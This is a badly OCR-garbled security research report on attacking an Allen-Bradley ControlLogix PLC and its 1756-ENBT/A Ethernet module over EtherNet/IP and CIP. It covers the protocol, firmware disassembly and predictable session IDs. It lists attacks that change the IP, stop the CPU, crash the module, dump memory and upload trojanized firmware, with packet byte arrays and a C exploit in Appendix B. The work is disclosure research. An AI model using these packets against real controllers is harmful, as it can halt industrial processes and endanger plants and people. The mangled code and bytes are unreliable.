Protocol - Reverse Mode
Contents
1. M ETHI FD digital Dond ATTACKING TREOLLUGILA Ruben Santamarta www reversemode co 1 INTRODUCTION Device Background 2 METHODOLOGY Tools Time tracking 3 TECHNICAL DETAILS 3 1 Network Monitoring Reverse engineering Rockwell Software Logix CPU security tool 3 2 Explore CIP Protocol Service codes classes attributes instances 3 3 Reverse engineering the firmware 4 CONCLUSIONS APPENDIX A REFERENCES APPENDIX B EXPLOIT 1 INTRODUCTION As part of the Project Basecamp the author was provided with an AB ControlLogix 1756 controller comprised of the following modules Logix 5561 CPU 16 20 08 1756 ENBT A module 4 03 02 Device Background Extracted from http www ab com en epub catalogqs 12762 2181376 2416247 360807 360809 tab2 html The ControlLogix system provides discrete drives motion process and safety control together with communication and state of the art 1 0 A simple ControlLogix system consists of a standalone controller and modules in a single chassis galla HEDE uli Servo PowerFlex 70 m ArmorBlock m i Guard I O Pam Valve Servo Motor gt ET DeviceNet Plant MRP System Database ControlNet z CompactBlock Flowmeter Guard 1 0 Ti Level H Foundation Fieldbus LE EtherNet IP ELI FLEX XT 1 0 am2. Once the valid Session ID has been obtained it uses Send RR Data to issue CIP requests text 0040959F mov edx ebp var 70 Crafting ENIP header text 004095A2 mov word ptr edx 6Fh Send RR Data Command text 004095A7 mov eax ebp var 38 text 004095AA and eax OFFFFh text 0040965B mov word ptr edx 0B2h Unconnected Send text 00409660 mov eax ebp var 88 text 00409666 mov word ptr eax 2 8 text 004096A6 mov edx ebp var 20 text 004096A9 mov byte ptr edx 1 OF5h Class OxF5 TCP IP CIP object text 004096AD mov eax ebp var 20 text 004096B0 mov byte ptr eax 2 24h Instance Segment text 004096B4 mov ecx ebp var 20 text 004096B7 mov byte ptr ecx 3 1 text 004096BB mov edx ebp var 20 text 004096BE mov byte ptr edx 4 30h Attribute segment text 004096C2 mov eax ebp var 20 text 004096C5 mov byte ptr eax 5 3 Attribute Configuration Control If we continue analyzing the routine sub 40934C we will see how different packets to enable disable BOOTP DHCP capabilities are forged We have also seen how this tool initializes the connection by requesting a Session ID just like the drivers do 10 Attack 1 Change the IP We can extend the capabilities of this software The attribute 0x5 Interface Configuration of the TCP IP CIP object allows us to set the following fields IP Address Network Mask Gateway Address Name Server Na
3. ROM 00142BB8 ROM 00142BB8 set var 8 8 ROM 00142BB8 set var 4 4 ROM 00142BB8 set arg 4 4 ROM 00142BB8 ROM 00142BB8 stwu 965 0x10 sp ROM 00142BBC mflr r0 ROM 00142BCO stw r30 Ox10 var 8 96sp ROM 00142BC4 stw 96r31 Ox10 var 4 sp ROM 00142BC8 stw r0 Ox10 arg 4 965 ROM 00142BCC 15 r30 0x33 3 ROM 00142BDO lis 96r31 a MasterlibN 0x10000 Qh MasterLib nv obj c ROM 00142BD4 18 ROM 00142BD4 loc 142BD4 8 CODE XREF nv ObjectTask 54j ROM 00142BD4 ROM 00142BD4 ROM 00142BD8 ROM 00142BDC ROM 00142BEO ROM 00142BEA ROM 00142BE8 ROM 00142BEC ROM 00142BFO ROM 00142BF4 ROM 00142BF8 ROM 00142BF8 ROM 00142BF8 loc 142BF8 ROM 00142BF8 ROM 00142BFC ROM 00142C00 ROM 00142C04 ROM 00142C08 ROM 00142COC ROM 00142C10 ROM 00142C10 ROM 00142C10 loc 142C10 ROM 00142C10 ROM 00142C14 ROM 00142C18 nv_ObjectTask 60j Iwz r3 OxX1EA4 r30 bl GS TakeMsgQueue _ mr r5 r3 Iwz r0 4 r5 cmpwi r0 0x51 beq loc_142BF8 cmpwi r0 0x84 beq loc 142C1C b loc 142C50 CODE XREF nv ObjectTask 30j Ihz r0 Ox1A 96r5 cmpwi r0 0 beq loc 142C10 mr X 96r3 r5 bl nv ProcessinstanceRequest loc 142BD4 CODE XREF nv_ObjectTask 48j mr r3 r5 bl nv_ProcessClassRequest b loc 142BD4 ROM 00141C3C nv ProcessInstanceRequest ROM 00141C6C ROM 00141C70 ROM 00141C74 ROM 00141C78 ROM 00141C7C ROM 00141C80 00141 84 00141
4. 1 n Other Devices p rr wal krvel uard PovverFlex 70 a FLEX 1 0 PowerFlex 755 2 METHODOLOGY The only possible approach is a blackbox one In order to help the reader to better understand how this research was performed some aspects are detailed below Tools Reverse engineering o IDA Pro o Immunity Debugger o deeze Network monitoring o Microsoft Network Monitor o Wireshark o Nmap o Snmpwalk o MiIBrowser C C Compiler o Visual Studio o GCC Time tracking 45h approx Reverse engineering Network Monitoring Information Gathering Reading Programming Testing Note to the reader It is highly recommended to read at least some of the references in the Appendix A It contains most of the documents consulted during the research Therefore some of the concepts terminology and technical details comprehensively explained in that documentation are assumed and will not be mentioned in this report 3 Technical details 1756 ENBT A brings ethernet connectivity to the controller thus opening up the door to a whole range of remote attack vectors Via nmap snmp netstat TCP 0 0 0 0 80 0 0 0 0 http GoAhead TCP 0 0 0 0 111 0 0 0 0 rpcbind TCP 0 0 0 0 44818 0 0 0 0 EtherNet IP Explicit Messages UDP 0 0 0 0 68 dhcp if enabled UDP 0 0 0 0 111 UDP 0 0 0 0 161 snmp UDP 0 0 0 0 2222 EtherNet IP Implicit I O UDP 0 0 0 0 44818 By usi
5. 84 ROM 00141C84 loc 141C84 ROM 00141C84 00141 88 ROM 00141C8C cmpwi r4 Ox4B NV Update service code beq loc 141CC8 bgt loc 141C84 cmpwi r4 1 beq loc 141C90 b loc 141DDO CODE XREF nv ProcessinstanceRequest 38 j cmpwi r4 Ox4D NV_transfer service code beq loc_141D4C loc 141DDO 19 4 CONCLUSIONS One of the most time consuming tasks I came across during this research was reading all the technical documentation gathered Initially this fact may sound weird but it is nothing unusual at all while researching into industrial devices which commonly suffer from a lack of strong security measures implemented by design the hardest part is not learning how to break things but understanding how it really works Therefore the key point behind attacking this PLC was not how to circumvent its security but monitoring how the legitimate software performed valid operations in order to mimic them in addition to the usual dose of reverse engineering and fuzzing to discover the secrets behind the scenes To sum up any legit functionality supported by the controller could also be used by a malicious user in a malicious manner During this journey we have identified problems that can be used to cause a DoS load a trojanized firmware o leak information Actually it s not a bug it s a feature 20 APPENDIX A REFERENCES Leveraging Ethernet Card Vulnerabilities in Field Device http vvvvvv digit
6. CIP stack ci_ParseSegment function so other packets can also trigger this flaw CIP Unconnected send Service Oxe Get Attribute Single Class OxF5 TCP IP Others can be possible unsigned char packetCrashEth WL ROO ROO NKUL SUL x20x00 x02 NSU x00 NNK NSU NN NO xocuz00 sozle x02 NENNE NELL NSL 42 4 xl NL ONA Crash Display Fatal Log Event Status 0x303 iParameter 0x3e pParameter 0x9d2770 Source MasterLib ci util c 1040 Task Information NAME TID SIZE CUR HIGH MARGIN EI gaias 5112 208 1840 3272 r 0 00000000 ri 0 003 0048 r2 0 00000000 r3 0x00000000 r 0 00000000 rS 0x00000000 re 0x00000000 r7 0x00000000 r 0x00000000 r8 0x00000000 ri 0x00000000 rii 0x00000000 riz 0x00000000 ris 0x00000000 rid 0x00000000 r15 0x00000000 16 0x00000000 rir 0200000000 ris 0x00000000 r19 0x00000000 20 0x00000000 r21 0 00000000 22 0x00000000 r23 0200000000 r24 0 00000000 25 0x00000000 26 0x00000000 r27 0x00000000 r28 0x00000000 r29 Oxffffffff r30 0x00009032 r31 0x009b65e0 mar 0x00009032 Ir 0x00000000 ctr 0x00000000 pc 0x0028d3b0 cr 0 20000000 xer 0x00000000 dar 0x00000000 dsisr 0x00000000 Call Stack caller func 0x297a94 vxTaskEntry xiZ9ae EI ObjectTask Ox129b98 EI ObjectTask 0 12 974 ei ProcessInstanceRequest 12 0 ei ProcessInstanceRequest 12 50 ei ProcessGetAttrSingleIn
7. ENCAP H J posession RED SESSTONF calloe 1 S Z OT REO SESSION X 23 phepiy woid oelloc 02200 1 y PREG gt void GALLOG 0 200 1 Getting SessionID pSession gt req Common alEncaph context 0 pSession gt req Common alEncaph context I pSession gt req Common iEncaph command 0 0 ENCAP CMD REGISTERSESSION i ps ssLon gt reg Common 1Encaph length Blazeor ULNT32 J peessron reg Common lBncaph Opt psession req Common lbncaph session U pSession req Common lEncaph status 0 peessron reg Proto 0xlj poessson e reg Flags 0 LE connect nbt socket Struct sockaddr peer s1zeof sockaddr in printf NnController unreachable nn exit 0 send enbt socket const char p5ession SizeoT REQ SESSION NULL r recvtenbt socket Ghar prReply 29y NULL g oesslonld e UINT32 UINTSZF p pReply L jy printf L Received session Handler an g o6essionid Deep fried controller DoS ing CPU and EtherNet IP Module forgePacket packetCPUStop sizeof packetCPUStop 1 ENCAP CMD SEND RRDATA enot Socket forgePacket packetCrashEth sizeof packetCrashEth l ENCAP CMD SEND BEDATA enot Socket return 0 24
8. Ox10 var 4 sp ROM 00119788 addi sp 96sp 0x10 ROM 0011978C blr ROM 0011978C End of function ab Init All the Init functions are initializing objects in order to get the Class ID we have to find these instructions right before a call to GS PutMsgQueue li r9 OxXX where XX is the class ID sth r9 Ox14 r4 Let s see an example NV Init Assuming NV stands for Non Volatile it is a vendor specific object implemented to handle the process firmware upgrading Services implemented e Ox4b NV Update see Attack 7 above e Ox4d NV Transfer ROM 00141A44 stw r0 4 r4 ROM 00141A48 li r9 0xA1 matches our Attack 7 Class Id ROM 00141A4C sth r9 Ox14 r4 ROM 00141A50 li 9 r11 1 ROM 00141A54 sth 6r11 0x16 r4 ROM 00141A58 lis r9 0x33 3 ROM 00141A70 bl GS PutMsgQueue If we want to analyze how the specific object is implemented we should locate its associated object task i e NV Init ROM 001419E0 15 r9 nv_ObjectTask h ROM 001419E4 lis r11 unk_29DC40 0x10000 h ROM 001419E8 addi r9 r9 nv_ObjectTask ROM 001419EC li r8 0 001419 addi r11 r11 0x23C0 unk 290 40 ROM 001419F4 li r0 0x1800 ROM 001419F8 li r10 OX3D ROM 001419FC stw 96r9 Ox40 var 30 96sp ROM 00141A10 stw r8 0x40 var_2C sp ROM 00141A14 addi r3 965 Ox40 var 30 ROM 00141A18 bl GS NewTask ROM 00142BB8 nv ObjectTask DATA XREF NV Init 500 ROM 00142BB8 tt NV Init 580
9. Previous work See first reference in Appendix A has been done on this matter so we will only explain how the firmware can be reconstructed and used to discover vendor specific objects Reconstructing the firmware Once extracted from the wbn file i e using matasano s deeze we load it on IDA and perform the following steps 1 Select PowerPC processor 2 Rebase to 0x100000 3 Runthis publicly available script to discover additional functions if IDA pro fails doing so 4 Reconstruct the vxworks symbol table a Find the cross references of this string nAdding ld symbols for standalone An b Locate the symbol table by finding these instructions at the routine which references the string above ROM 001022B4 ROM 001022B8 ROM 001022BC ROM 001022C0 ROM 001022C4 ROM 001022C8 c Edit this script lis lis lis lis bge lis r28 0x34 4 r30 dvvord 309630 0x10000 h end address r26 0x34 4 r27 dword_2F3F80 h loc 1022FO r9 dword 2F5840 Qh start address htto www reversemode com images stories schneider files vxworks symta ble idc adjust eaStart to Ox2F5840 and eaEnd to 0x309630 and run it 15 Discovering vendor specific objects By reverse engineering this function we can discover the Class ID of the vendor specific objects ROM 00119600 ab Init ROM 00119600 ROM 00119600 ROM 00119600 ROM 00119600 ROM 00119600 ROM 00119600 ROM 00119600 ROM 00119604 ROM 00
10. 00 00 00 00 00 02 00 02 00 OO OO 00 00 b2 00 20 06 24 01 03 fO 11 00 51 02 20 8e 41 42 43 04 00 41 42 43 44 00 01 00 Old password ABC gt New Password ABCD Unsecure CPU Class Ox8E Service 0x53 1 0 000000 192 168 1 44 192 168 1 35 2 0 012087 192 168 1 35 192 168 1 44 CIP CM 120 unconnected Send Unknown Service 0x53 CIP 98 Success Item Count 2 0 Request Response Request 0x00 101 0010 Service Unknown 0x52 Request Path Size 2 words Request Path Connection Manager Instance 0x01 8 B t Logical Class Segment 0x20 Class Connection Manager 0x06 8 Bit Logical Instance Segment 0x24 Instance 0x01 E CIP Connection Manager Service Unconnected Send Request 0 Request Response Request 0x00 101 0010 Service unknown 0x52 Command Specific Data Priority Time tick 0x03 Time out ticks 240 Actual Time Out 1920ms Message Request Size 0x000C Message Request common Industrial Protocol Service Unknown Service 0x53 Request 0 Request Response Request 0x00 101 0011 service unknown 0x53 Request Path Size 2 words Request Path Class Ox8bE Instance 0x01 8 Bit Loqical Class Segment 0x20 Response In 2 common Industrial Protocol Service Unknown Service 0x52 Request 0040 00 00 b8 15 00 00 88 65 46 02 00 00 00 00 00 00 0050 00 00 02 00 02 00 00 00 00 00 b2 00 la 00 HEGE 00
11. 11 Send Request Reply Data typedef unsigned short UINT16 typedef unsigned int UINT 32 typeder struct _encap h UINT16 iEncaph command Command code UINT16 iEncaph length Total transaction length UINT32 lEncaph session Session identifier UINT32 lEncaph status Status code UINTS2 alEncapn context 2 7 Context information UINT32 lEncaph opt Options flags ENCAP H PENCAP H typedef struct req session ENCAP H req Common UINTIS Peg Proto UINTIO req Flags REQ SESSION PREQ SESSION UINIS2 g Sessionld bool forgePacket unsigned char packet UINT32 len UINT32 commID SOCKET client Attacks presented in the paper unsigned char packetCPUStop AXODAVXODVXDOVEXOUDVAXDUZXXUDXXUZXXODAXODVEXUDXVxOUOXXDONxDZAxXUDAXIAXEO0U xb 02 x20 06 x24 x lVx S SEO ox c 00 vx07 vx02 x20 Vx64 x24 vx l IADE xD XBEXEF KOR NSFE VO LNXOO NOLL x00 unsigned char packetCrashCPU w x00 x00 x00 x00 x02 x00 e02 x00 x00 x00 x00 x00 xb7 x00 xla x00 Wye 06 NK x0 x s 0 ede 0 NA NSO NI NS 24 0 MRI NKO ROS KOOKS NL SIL NSD AOL x00 unsigned char packetCrashEth POT xXU UVZUU x00 120 NON NSO xU NEO NNN SON D NN 200 ND DUO ENDE NOI ix 270 25 244 014 104 4341 241 014 104 48 unsigned char packetDump WMNX00Nx00Nx00Nx00Nx00Nx04Nx02Nx00Nx00Nx00Nx00Nx00Nxb2Nx00Nx08Nx00 OT x Z NKO Vac0 Vx24 00 1X 00400
12. 119608 ROM 0011960C ROM 00119610 ROM 00119614 ROM 00119618 ROM 0011961C ROM 00119620 ROM 00119624 ROM 00119628 ROM 0011962C ROM 00119630 ROM 00119634 ROM 00119638 ROM 0011963C ROM 00119640 ROM 00119644 ROM 00119648 ROM 0011964C ROM 00119650 ROM 00119654 ROM 00119658 ROM 0011965C ROM 00119660 ROM 00119664 ROM 00119668 ROM 0011966C ROM 00119670 ROM 00119674 ROM 00119678 ROM 0011967C ROM 00119680 ROM 00119684 ROM 00119688 ROM 0011968C ROM 00119690 ROM 00119694 ROM 00119698 ROM 0011969C ROM 001196A0 ROM 001196A4 ROM 001196A8 ROM 001196AC ROM 001196B0 ROM 001196B4 ROM 001196B8 ROM 001196BC ROM 001196C0 set var 4 4 set arg 4 4 Stwu mflr S VV S VV mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr bl mr bne mr H CODE XREF AB Init 10p H AB Init 34p H DATA XREF sp 0x10 96sp r0 r31 Ox10 var_4 sp r0 Ox10 arg 4 965 r31 r3 GS Init r3 r3 loc 11977C r3 96r31 EN CD Init r3 r3 loc 11977C r3 r31 EN Init r3 r3 loc 11977C r3 r31 CD Init r3 r3 loc 11977C r3 r31 MA CD Init r3 r3 loc 11977C r3 r31 CM Init r3 r3 loc 11977C r3 r31 ID Init r3 r3 loc 11977C r3 r31 MR Init r3 r3 loc 11977C r3 r31 UM Init r3 r3 loc 11977C r3 r31 MA UM Init r3 r3 loc 11977C r3 r31 BR Init r
13. 22 unsigned char packetResetEth TOO 200 Ol EIT EON NA NS 00 Ven SON SON KON OD DNO H X B KOS NKO NKOLNX2ANKOLNEIONEOS unsigned char packetFlashUp FO 200 OD ROD 205 00 NON 00 ve00 SI ON NSO LO NSD 24D NKO NSO xal x24 NSL NKO VON NKO 200 TT AN x20 NATT 0xX241x60 S O0NKOONKOLNEOONXOLNXOD E ey 7 bool forgePacket unsigned char packet UINT32 len UINT32 commID SOCKET client ENCAP H pHeader void pReq pHeader HF calloc 1 sLizeoP BNCAP H PREG void calloc 0x200 1 pHeader iEncaph command commID pHeader ibncaph length l n pHeade r lEencaph session g Sessionid memcpy pReq pHeader sizsofrf ENCAP H 1 memcpy UINIS pReq sSizeof H packet len printf 4 Sending malicious packet printf XXn send client const char pReg len sizeof ENCAP NULL recv client char pReg Ox10 NULL return true int main int argc ghar argv WSADATA ws SOCKET enbt socket struct sockaddr in peer ENCAP H pHeader REQ SESSION pSession void pReply void pReg pReq2 int i ifi arge 2 9 printf nusage exploit exe ip exit 0 WSAStartup 0x0202 amp ws p r s1n family AF INET peer sin port hbonsT ENBT PORT X3 per sin addr s addr inet addr argyll 7 enbt socket socket AF INET SOCK STREAM 0 pileader ENCAP H calloc 1 Bizeor
14. 3 r3 loc 11977C r3 r31 16 ROM 001196C4 bl DB Init ROM 001196C8 mr r3 r3 ROM 001196CC bne loc 11977C ROM 001196D0 mr r3 r31 ROM 001196D4 bl ICP Init ROM 001196D8 mr r3 r3 ROM 001196DC bne loc 11977C ROM 001196E0 mr r3 r31 ROM 001196E4 bl ED Init ROM 001196E8 mr 96r3 96r3 ROM 001196EC bne loc 11977C ROM 001196FO mr r3 r31 ROM 001196F4 bl ET Init ROM 001196F8 mr r3 r3 ROM 001196FC bne loc 119770 ROM 00119700 mr r3 r31 ROM 00119704 bl El Init ROM 00119708 mr r3 r3 ROM 0011970C bne loc 11977C ROM 00119710 mr r3 r31 ROM 00119714 bl EL Init ROM 00119718 mr r3 r3 ROM 0011971C bne loc 11977C ROM 00119720 mr r3 r31 ROM 00119724 bl EM Init ROM 00119728 mr r3 r3 ROM 0011972C bne loc 11977C ROM 00119730 mr r3 r31 ROM 00119734 NV Init ROM 00119738 mr 96r3 r3 ROM 0011973C bne loc 11977C ROM 00119740 mr r3 r31 ROM 00119744 bl RA Init ROM 00119748 mr r3 r3 ROM 0011974C bne loc 11977C ROM 00119750 mr r3 r31 ROM 00119754 bl ACMI Init ROM 00119758 mr r3 r3 ROM 0011975C bne loc 11977C ROM 00119760 mr r3 r31 ROM 00119764 bl FIU Init ROM 00119768 srawi r9 r3 Ox1F ROM 0011976C xor r0 r9 r3 ROM 00119770 subf r0 96rO r9 ROM 00119774 srawi r0 r0 1 ROM 00119778 and 96r3 r3 rO ROM 0011977C ROM 0011977C loc 11977C CODE XREF ab Init 1Cj ROM 0011977C ab Init 2Cj ROM 0011977C Iwz r0 Ox10 arg 4 965 ROM 00119780 mtlr r0 ROM 00119784 Iwz r31
15. 60 06 24 01 03 TO Oc 00 53 02 20 Se 24 01 04 00 0070 42 43 44 01 00 01 00 Passvvord ABCD Replay attacks are totally possible in this scenario in general better said since the encapsulated C P packet does not vary we only need a valid Session D which can be obtained without problems That is one of the ideas vve vvant to shovv in this section interact vvith the softvvare vvhile monitoring the netvvork to analyze the netvvork traffic Let s see another one reverse engineering softvvare to extract functionalities This tool is slightly different it is used to configure the mms 1756 ENBT A module or any Clear Histoy Add to Relation List O ther similar in a more direc t hr min sec Type Ethernet Address MAC IP Address Hostname way without using drivers By forging its own encapsulated CIP packets this Rockwell tool can enable disable some of the IT functionalities the common TCP IP CIP object implements File Tools Help Status Entries of 256 BootpServer exe sub 40934C text 0040946E loc 40946E CODE XREF sub 40934C C3 text 00409477 mov ebp var_ 701 ecx text 0040947A mov edx ebp var 70 Crafting ENIP header text 0040947D mov word ptr edx 65h RegisterSession Command text 00409482 mov eax ebp var 54 text 004094D5 mov eax ebp var 4C text 004094D8 mov word ptr eax 1 Protocol Version text 004094DD mov ecx ebp var_4C
16. Layers User Device Profiles CIP Application Layer Application Application Object Library CIP CIP Data Management Services Presentation Explicit Messages I O Messages Session CIP Message Routing Connection Management Transport Encapsulation Metwork Data Link Possible future alternatives ATM USB In order to successfully send EtherNet IP packets we need a valid Session ID which can be obtained through the Register Session Command 1 Client sends Register Session ENIP EtherNet IP packet El Transmission Control Protocol src Port lupa 1212 Dst Port EtherNet IP 2 44818 EtherNet IP Industrial Protocol session 0x00000000 Register Session Encapsulation Header Command Register Session 0x0065 Length 4 session Handle 0x00000000 Status Success 0x00000000 sender Context 0000000000000000 Options 0x00000000 Command specific Data Protocol version 1 Option Flags 0x0000 2 Server replies with a randomly generated session id totally predictable Transmission Control Protocol src Port EtherNet IP 2 44818 Dst Port lupa 1212 EtherNet IP Industrial Protocol session 0x16020100 Register Session Encapsulation Header Command Register session 0x0065 Length 4 session Handle 0x16020100 Status Success 0x00000000 sender Context 0000000000000000 Options 0x00000000 command specific Data Protocol version 1 Option Flags 0x0000 Every ENIP pack
17. albond com vvp content uploads 2011 05 1 PLC final pdf Developer Hovv To Guides http www rockwellautomation com enabled guides htmi INTERFACING THE CONTROLLOGIX PLC OVER ETHERNET IP http arxiv org ftp cs papers 0110 0110065 pdf CIP user manual amp Installation guide http www n tron com pdf cip usermanual pdf The CIP Networks Library http www odva org Home CIPNETWORKSPECIFICATIONS HowOrganizedPublished tabid 79 Ing en US language en US Default aspx Ethernet IP Library http www odva org Home ODVATECHNOLOGIES EtherNetIP EtherNetIPLibrary tabid 76 In g en US language en US Default aspx The Common Industrial Protocol CIPTM and the Family of CIP Network Ethernet IP Industrial Protocol http www odva org Portals O Library Publications Numbered PUBOO123RO Common 620In dustrial Protocol and Family of CIP Netw pdf http www technologyuk net telecommunications industrial networks cip shtml http www rockwellautomation com industries water get enetip pdf http en wikipedia org wiki EtherNet IP http sourceforge net projects opener 21 APPENDIX B EXPLOIT Project Basecamp Attacking ControlLogix Deep fried controller Exploit attacks presented include lt winsock2 h gt include lt windows h gt include lt stdio h gt fpragma comment lib wsock32 1ib define ENBT PORT 44818 define ENCAP CMD REGISTERSESSION 101 Register Session define ENCAP CMD SEND RRDATA 1
18. d of device that is responding to its request from what components the controller is comprised of and what type of basic functionalities it has This is done by issuing request to different CIP objects via different Service Codes i e in this image we can see how the driver interrogates the Identity object class 0x1 Instance 0x1 to identify CPU type among other things 85 38 540506 192 168 1 44 192 168 1 35 CIP CM 114 Unconnected Send Get Attribute All 86 38 541329 192 158 1 15 192 168 1 44 TCP 60 EtherNet IP 2 gt lupa ACK Seq 1748 87 38 543664 192 166 1393 192 168 1 44 CIP 133 Success 88 38 549131 192 168 1 44 192 168 1 35 CIP CM 122 Unconnected Send Get Attribute List 89 38 555904 192 168 1 35 192 168 1 44 CIP 118 Success 4 n 0050 00 00 02 00 02 00 00 00 00 00 b2 00 27 00 81 00 0060 00 OO MEET TET N EEE TE PJ 0070 iFEEEEPEELEEI JP ET SEED ra L yapi V RE 0080 Ele Mai Ma EE Logix CPU security tool Logix CPU Security sam la The only CPU side security measure we found is this File Controller Security Status SECURED Help feature This tool supposedly allows the operator to put a the CPU in a secure state The attacks presented in this report still works even in a secured state so the full Password Status Password exists in controller Secure Controller Unsecure Controller scope of this functionality is not clear By sniffing the traffic generated we can discove
19. et we send must contain our session handle That s all we hacked the controller There is no other security measure at the protocol level The only but not trivial barrier we face right now is discovering how Allen Bradley has implemented the CIP common objects as well as any other vendor specific additional object That would allow us to gain the knowledge needed in order to fully control the PLC From now on our work consist in discovering what kind of vendor specific CIP objects the 1756 ENBT A implements and how we can use them to compromise the controller This task can be accomplished through 3 main different but complementary methods The following tables represent the pros and cons of each one Network Monitoring Reverse engineering Rockwell Software Pros Cons Easy to accomplish Limited you may miss functionality only used by AB s internal tools and or backdoors You can copy paste packets You can mimic main functionalities OOB Dynamic Explore CIP Protocol Service codes classes attributes instances Pros Cons Easy to accomplish Limited you may miss internal developer tools functionality backdoors Discover hidden functionalities backdoors Time consuming Discover vulnerabilities due to malformed Fuzzing programming efforts packets Dynamic Reverse engineering firmvvare Pros Cons Access to the vvhole set of functionalities It may be more difficult than other options Discover hidden functionalit
20. ice 0x44 35 72 420289 192 168 1 33 192 168 1 38 CIP 104 Success 56 72 422328 192 168 1 38 192 168 1 33 CIP 454 unknown Service 44 57 72 424555 192 158 1 33 192 168 1 38 CIP 104 Success 58 72 426660 192 168 1 38 192 168 1 33 CIP 454 unknown service 0x44 39 72 428971 192 168 1 33 192 168 1 38 CIP 104 Success D 72 432678 192 168 1 38 192 168 1 33 CIP 454 unknown Service 0x4d 61 72 435043 192 168 1 33 192 168 1 38 CIP 104 Success 62 72 437043 192 168 1 38 192 168 1 33 CIP 454 unknown service 0x4d bl 72 439267 192 168 1 33 192 168 1 38 CIP 104 Success Updating firmware via nv update and nv transmit see section 3 3 for more information All these attacks were developed by exploring the CIP protocol capabilities in a semi automated manner using valid CIP packets as templates Later on additional information such as vendor specific object and service names were extracted by reversing firmware Note that the packets presented are only the CIP packet you need to encapsulate it as we have seen before To sum up 1 Obtain a valid a session ID via Register Session EtherNet IP Command 2 Forgea EtherNet IP Header with this session ID and the Send RR Data Command Ox6F 3 Prepend this header to the malicious packet before sending it See Appendix B exploit c for more information Attacks successfully tested against 1756 ENBT A Rev 4 0X Logix 5561 Rev 16 20 08 14 3 3 Reverse engineering the firmware
21. ies backdoors Time consuming Limited access to firmvvare files Mainly static dynamic may also be possible During this research all these approaches vvere tested 3 1 Network Monitoring Reverse engineering Rockwell Software RSLogix RSLinks and other Rockwell Software can be easily downloaded from Rockwell support website By interacting with this software while monitoring the network traffic we can easily analyze and extract the packets needed to monitor and control the PLC i e obtain information about the processes running on the CPU or update the firmware The vast majority of Rockwell s software uses the proper drivers to speak with the controller according to its kind of connection that s the right way to do so Let s see some of the initial network flow captured between Rockvvell s drivers and the EtherNET IP module 1 The driver is trying to discover who is active on the Ethernet network by sending a List identity broadcast message User Datagram Protocol Src Port 50028 50028 Dst Port EtherNet IP 2 44818 EtherNet IP Industrial Protocol Session 0x00000000 List Identity m Encapsulation Header Command List Identity 0x0063 Length 0 Session Handle 0x00000000 Status Success 0x00000000 sender Context 0000000000000000 Options 0x00000000 2 The 1756 ENBT A module responds to this request 4 32 280805 192 168 1 44 2552755 2557255 ENIP 66 List Identity Req 3 Then it starts to discover the kin
22. me Server 2 Domain Name Thus we just need a packet to modify this interface This may lead to some immediate scenarios such as DoS due to invalid data or MITM attacks Service 0x10 Set Attribute Single Class OxF5 TCP Ip Object Attribute 0x5 Interface Control unsigned char packetSetIP MPAXODOXXxOOXXDOXXOOXXDOXxOZXXxOZXxDOXXDOXxDOWSDODVXxDOYXXxbZXxDOXXxXZ4NxDO va X20 XrF5 X24242 X T x30ixD5 Ho TG xXOO xXFF XFF XFF Netvork NXOINXOILNXASNXCO GW XxDOXsDOXDOXXDO U 451 00 004 00 00 7 N82 Nx06Nx00pO0wned Domain name This attack functionality turned evil works even if the controller has been secured by the Logix CPU security tool 11 3 2 Explore CIP Protocol Service codes classes attributes instances This task involves the creation of a simple or complex tool intended to explore all the possible combinations of Service codes classes attributes instances supported by the common CIP objects as well as the vendor specific CIP objects It s basically a brute force approach Some attacks obtained as a result of this approach Attack 2 Forcing a CPU Stop Impact Stops the CPU leaving it in a Major recoverable fault state In order to clear the fault the key needs to be turned manually from RUN to PROG twice CIP Unconnected send CM via 0x52 Service 0x7 STOP fr Clase 0x64 unsigned char packetCPUStop x00 x00
23. ng snmpwalk or MIB Browser we can easily interact with the MIB II level tree supported by this device SNMP MIBs Lu MIB Tree iso org dod internet Rockwell Automation 1756 mgmt ysObjectID 0 1 3 6 1 4 1 95 1 12 k mib 2 mi sysUpTime 0 44 minutes 56 seconds 269670 i system ysContact 0 W sysDescr I sysName 0 sysObjectID sysLocation 0 The interesting port here is 44818 which corresponds to the EtherNet IP application protocol EtherNet IP is an application layer protocol treating devices on the network as a series of objects EtherNet IP is built on the Common Industrial Protocol CIP for access to objects from ControlNet and DeviceNet networks http en wikipedia org wiki EtherNet IP This port is used by the Rockwell Automation software RSLogix RSLink drivers to communicate via Explicit Messages with those ControlLogix controllers which have EtherNet IP modules enabled EtherNet IP encapsulates CIP Explicit Messages so basically a valid a EtherNet IP packet is comprised of the following encapsulation header and a CIP packet Dyer BL SE enosp n UINT16 iEncaph command Command code UINT16 iEncaph length Total transaction length 7 UINT32 LEnc ph session Session identifier UINT32 lEncaph status j Status code UINT32 alEncaph context 2 Context information UINT32 lEncaph opt Options flags ENCAP H PENCAP H OSI
24. r how we can change the password put the CPU into a secured or Change Password Pahtocentole unsecured state As we can see the password is sent in 00s clear text moreover there is no limit of attempts so a Exit Help brute force attacks is possible as well Set password Class 0x8E Service 0x51 1 0 000000 192 168 1 44 192 168 1 35 2 0 012380 192 168 1 35 192 168 1 44 CIP CM 126 Unconnected Send Unknown Service 0x51 CIP 98 Success amp Item Count 2 Response In 2 m common Industrial Protocol Service Unknown Service 0x52 Request 0 Request Response Request 0x00 101 0010 service unknown 0x52 Request Path Size 2 words E Request Path Connection Manager Instance 0x01 8 Bit Logical Class Segment 0x20 Class Connection Manager 0x06 8 Bit Logical Instance Segment 0x24 Instance 0x01 E CIP Connection Manager Service Unconnected Send Request 0 Request Response Request 0x00 101 0010 service unknown 0x52 Command Specific Data Priority Time tick 0x03 Time out ticks 240 Actual Time Out 1920ms Message Request Size 0x0011 Message Request Common Industrial Protocol amp Service Unknown Service 0x51 Request Request Path Size 2 words Request Path Class Ox8E Instance 0x01 CIP Class Generic Command Specific Data Data 0300414243040041424344 00 00 11 Ob 00 00 88 65 46 02 00 00 00
